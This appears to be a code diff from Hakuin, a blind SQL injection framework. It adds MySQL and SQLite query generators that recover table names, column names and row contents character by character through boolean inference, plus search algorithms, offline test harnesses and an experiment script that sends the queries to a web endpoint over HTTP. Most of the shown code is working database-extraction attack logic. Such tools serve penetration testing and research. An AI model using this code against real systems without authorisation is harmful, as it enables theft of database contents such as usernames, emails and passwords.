SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class MySQLRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND
locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n}
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT {MySQL.escape(ctx.column)} in ({','.join(values)})
FROM {MySQL.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class MySQL(DBMS):
DATA_TYPES = [
@ -14,151 +303,15 @@ class MySQL(DBMS):
'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
]
MetaQueries = MySQLMetaQueries()
TablesQueries = MySQLTablesQueries()
ColumnsQueries = MySQLColumnsQueries()
RowsQueries = MySQLRowsQueries()
def count_rows(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM {ctx.table}
'''
return self.normalize(query)
def count_tables(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
'''
return self.normalize(query)
def count_columns(self, ctx, n):
query = f'''
SELECT COUNT(*) < {n}
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
'''
return self.normalize(query)
def meta_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT LOWER(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}' AND
COLUMN_NAME='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=DATABASE()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.COLUMNS
WHERE TABLE_SCHEMA=DATABASE() AND
TABLE_NAME='{ctx.table}'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT {ctx.column} in ({','.join(values)})
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
@staticmethod
def escape(s):
if DBMS._RE_ESCAPE.match(s):
return s
assert '`' not in s, f'Cannot escape "{s}"'
return f'`{s}`'

@ -1,145 +1,290 @@
from hakuin.utils import EOS
from .DBMS import DBMS
from .DBMS import DBMS, MetaQueries, UniformQueries
class SQLite(DBMS):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
def count_rows(self, ctx, n):
class SQLiteMetaQueries(MetaQueries):
def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT COUNT(*) < {n}
FROM {ctx.table}
SELECT type in ({','.join(values)})
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def count_tables(self, ctx, n):
def column_is_nullable(self, ctx):
query = f'''
SELECT COUNT(*) < {n}
SELECT [notnull] == 0
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info(x'{self.hex(ctx.table)}')
WHERE name=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class SQLiteTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM sqlite_master
WHERE type='table'
'''
return self.normalize(query)
def count_columns(self, ctx, n):
def rows_are_ascii(self, ctx):
# SQLite does not have native "isascii" function. As a workaround we try to look for
# non-ascii characters with "*[^\x01-0x7f]*" glob patterns. The pattern does not need to
# include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
# Also, the pattern is hex-encoded because SQLite does not support special characters in
# string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string
# resolves to True, which is correct.
query = f'''
SELECT COUNT(*) < {n}
FROM pragma_table_info('{ctx.table}')
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM sqlite_master
WHERE type='table'
'''
return self.normalize(query)
def meta_type(self, ctx, values):
values = [f"'{v}'" for v in values]
def row_is_ascii(self, ctx):
query = f'''
SELECT type in ({','.join(values)})
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def meta_is_nullable(self, ctx):
query = f'''
SELECT [notnull] == 0
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def meta_is_pk(self, ctx):
query = f'''
SELECT pk
FROM pragma_table_info('{ctx.table}')
WHERE name='{ctx.column}'
'''
return self.normalize(query)
def char_rows(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
query = f'''
SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
FROM {ctx.table}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_tables(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_columns(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('ascii').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info('{ctx.table}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string_rows(self, ctx, values):
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
query = f'''
SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
FROM {ctx.table}
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM sqlite_master
WHERE type='table'
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteColumnsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length(name) != {len(ctx.s)} AND
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
FROM pragma_table_info(x'{self.hex(ctx.table)}')
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx):
raise NotImplementedError('TODO?')
class SQLiteRowsQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
query = f'''
SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
FROM {SQLite.escape(ctx.table)}
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND
instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def string(self, ctx, values):
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
query = f'''
SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
FROM {SQLite.escape(ctx.table)}
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
class SQLite(DBMS):
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
MetaQueries = SQLiteMetaQueries()
TablesQueries = SQLiteTablesQueries()
ColumnsQueries = SQLiteColumnsQueries()
RowsQueries = SQLiteRowsQueries()

@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialSearch(SearchAlgorithm):
'''Exponential search for integers.'''
def __init__(self, requester, query_cb, upper=16, correct=None):
class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
upper (int): initial upper bound of search range
lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): exponentially expands range until the correct value is within
correct (int|None): correct value. If provided, the search is emulated
'''
super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper
self.find_range = find_range
self.correct = correct
self.n_queries = 0
@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
int: inferred number
'''
self.n_queries = 0
lower, upper = self._get_range(ctx, lower=0, upper=self.upper)
if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
return self._search(ctx, lower, upper)
def _get_range(self, ctx, lower, upper):
def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within.
Params:
ctx (Context): inference context
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
if self._query(ctx, upper):
return lower, upper
return self._get_range(ctx, upper, upper * 2)
return self._find_range(ctx, upper, upper * 2)
def _search(self, ctx, lower, upper):
'''Numeric binary search.
Params:
ctx (Context): inference context
ctx (Context): extraction context
lower (int): lower bound
upper (int): upper bound
@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
middle = (lower + upper) // 2
if self._query(ctx, middle):
return self._search(ctx, lower, middle)
else:
return self._search(ctx, middle, upper)
return self._search(ctx, middle, upper)
def _query(self, ctx, n):
@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, n)
return self.requester.request(ctx, query_string)
else:
return self.correct < n
return self.correct < n
@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
value|None: inferred value or None on fail
'''
self.n_queries = 0
return self._search(ctx, self.values)
@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
if self._query(ctx, left):
return self._search(ctx, left)
else:
return self._search(ctx, right)
return self._search(ctx, right)
def _query(self, ctx, values):
@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string)
else:
return self.correct in values
return self.correct in values
@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm):
'''Runs the search algorithm.
Params:
ctx (Context): inference context
ctx (Context): extraction context
Returns:
value|None: inferred value or None on fail
'''
self.n_queries = 0
return self._search(ctx, self.tree, in_tree=self.in_tree)
@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm):
'''Tree search.
Params:
ctx (Context): inference context
ctx (Context): extraction context
tree (utils.huffman.Node): Huffman tree to search
in_tree (bool): True if the correct value is known to be in the tree
@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm):
if self._query(ctx, tree.left.values()):
return self._search(ctx, tree.left, True)
else:
if tree.right is None:
return None
return self._search(ctx, tree.right, in_tree)
if tree.right is None:
return None
return self._search(ctx, tree.right, in_tree)
def _query(self, ctx, values):
@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm):
if self.correct is None:
query_string = self.query_cb(ctx, values)
return self.requester.request(ctx, query_string)
else:
return self.correct in values
return self.correct in values

@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__))
DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..'))
DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models')
ASCII_MAX = 0x7f
UNICODE_MAX = 0x10ffff
CHARSET_ASCII = [chr(x) for x in range(128)] + ['</s>']
CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + ['</s>']
EOS = '</s>'
SOS = '<s>'

@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs'))
class OfflineRequester(Requester):
'''Offline requester for testing purposes.'''
def __init__(self, db):
def __init__(self, db, verbose=False):
'''Constructor.
Params:
db (str): name of an .sqlite DB in the "dbs" dir
verbose (bool): flag for verbous prints
'''
db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
assert os.path.exists(db_file), f'DB not found: {db_file}'
self.db = sqlite3.connect(db_file).cursor()
self.verbose = verbose
self.n_queries = 0
def request(self, ctx, query):
self.n_queries += 1
query = f'SELECT cast(({query}) as bool)'
return bool(self.db.execute(query).fetchone()[0])
res = bool(self.db.execute(query).fetchone()[0])
if self.verbose:
print(f'"{ctx.s}"\t{res}\t{query}')
return res
def reset(self):

7
tests/dbs/unicode.json Normal file

@ -0,0 +1,7 @@
{
"Ħ€ȽȽ© ŴǑȒȽƉ": [
{
"Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
}
]
}

BIN
tests/dbs/unicode.sqlite Normal file

Binary file not shown.

@ -21,7 +21,7 @@ FILE_LARGE_CONTENT_JSON = os.path.join(DIR_DBS, 'large_content.json')
def main():
assert len(sys.argv) in [1, 3], 'python3 experiment_generic_db_offline.py [table> <column>]'
requester = OfflineRequester(db='large_content')
requester = OfflineRequester(db='large_content', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
if len(sys.argv) == 3:
@ -60,58 +60,58 @@ if __name__ == '__main__':
# {
# "users": {
# "username": [
# 42124,
# 5.738182808881624
# 42125,
# 5.738319030104891
# ],
# "first_name": [
# 27901,
# 4.882919145957298
# 27902,
# 4.883094154707735
# ],
# "last_name": [
# 32701,
# 5.344173884621671
# 32702,
# 5.344337310017977
# ],
# "sex": [
# 1608,
# 0.3216
# 1609,
# 0.3218
# ],
# "email": [
# 78138,
# 3.7532062058696383
# 78139,
# 3.7532542389163743
# ],
# "password": [
# 137115,
# 4.28484375
# 137116,
# 4.284875
# ],
# "address": [
# 86872,
# 2.1946795341434453
# 86873,
# 2.1947047975140843
# ]
# },
# "posts": {
# "text": [
# 409302,
# 4.312482220185226
# 409303,
# 4.312492756371759
# ]
# },
# "comments": {
# "text": [
# 346373,
# 3.920464063384267
# 346374,
# 3.9204753820033957
# ]
# },
# "products": {
# "name": [
# 491174,
# 3.8737341871983344
# 491175,
# 3.873742073882457
# ],
# "category": [
# 6721,
# 0.42975893599334997
# 6753,
# 0.4318051026280453
# ],
# "description": [
# 966309,
# 3.2259549579023976
# 966310,
# 3.2259582963324007
# ]
# }
# }

@ -27,3 +27,8 @@ def main():
if __name__ == '__main__':
main()
# Expected results:
# Total requests: 27376
# Average RPC: 2.2098805295447206

@ -25,13 +25,17 @@ class R(Requester):
r = requests.get(url)
assert r.status_code in [200, 404], f'Unexpected resposne code: {r.status_code}'
# print(ctx.s, r.status_code == 200, query)
return r.status_code == 200
def main():
assert len(sys.argv) == 4, 'python3 experiment_generic_db.py <dbms> <table> <column>'
_, dbms_type, table, column = sys.argv
assert len(sys.argv) >= 2, 'python3 experiment_generic_db.py <dbms> [<table> <column>]'
argv = sys.argv + [None, None]
_, dbms_type, table, column = argv[:4]
allowed = ['sqlite', 'mysql']
assert dbms_type in allowed, f'dbms must be in {allowed}'
@ -39,10 +43,12 @@ def main():
dbms = SQLite() if dbms_type == 'sqlite' else MySQL()
ext = Extractor(requester, dbms)
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))
if table is None:
res = ext.extract_schema(strategy='model', metadata=True)
print(json.dumps(res, indent=4))
else:
res = ext.extract_column(table, column)
print(json.dumps(res, indent=4))

@ -0,0 +1,29 @@
import json
import logging
from hakuin.dbms import SQLite
from hakuin import Extractor
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='large_content')
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(metadata=True)
print(json.dumps(res, indent=4))
res_len = sum([len(table) for table in res])
res_len += sum([len(column) for table, columns in res.items() for column in columns])
print('Total requests:', requester.n_queries)
print('Average RPC:', requester.n_queries / res_len)
if __name__ == '__main__':
main()

28
tests/test_unicode.py Normal file

@ -0,0 +1,28 @@
import json
import logging
import hakuin
from hakuin import Extractor
from hakuin.dbms import SQLite
from OfflineRequester import OfflineRequester
logging.basicConfig(level=logging.INFO)
def main():
requester = OfflineRequester(db='unicode', verbose=False)
ext = Extractor(requester=requester, dbms=SQLite())
res = ext.extract_schema(strategy='binary')
print(res)
res = ext.extract_column('Ħ€ȽȽ©', 'ŴǑȒȽƉ')
if __name__ == '__main__':
main()